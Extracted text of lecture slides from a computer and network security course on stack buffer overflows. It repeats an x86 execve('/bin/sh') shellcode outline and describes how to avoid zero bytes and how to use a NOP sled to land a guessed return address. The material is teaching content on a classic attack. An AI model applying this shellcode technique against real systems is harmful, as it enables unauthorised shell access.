Running Evil Code… 58 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string “bin/sh” code
59
Running Evil Code… 59 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #1: Zero Bytes
60
Running Evil Code… 60 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #1: Zero Bytes Solution: Generate on the fly (e.g., push $0x0 = xor %eax, %eax push %eax )
61
Running Evil Code… 61 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’
62
Running Evil Code… 62 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’
63
Running Evil Code… 63 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address code ret’ ret’ ret’
64
Running Evil Code… 64 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
65
Running Evil Code… 65 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
66
Running Evil Code… 66 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
67
Running Evil Code… 67 Basic Idea Sample Attacks Protection 6.857 6.857, Computer & Network Security ret sfp jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string jmp offset-to-call popl %esi movl %esi,0x8 movl $0x0,0xc movl $0xb,%eax movl %esi,%ebx leal 0x8,%ecx movl 0xc,%edx int $0x80 call offset-to-popl /bin/sh string Obstacle #2: Guessing the Return Address Solution: Add a NOP landing pad to increase the chance that your guess is right. code ret’ ret’ ret’ nop nop nop
Similar presentations
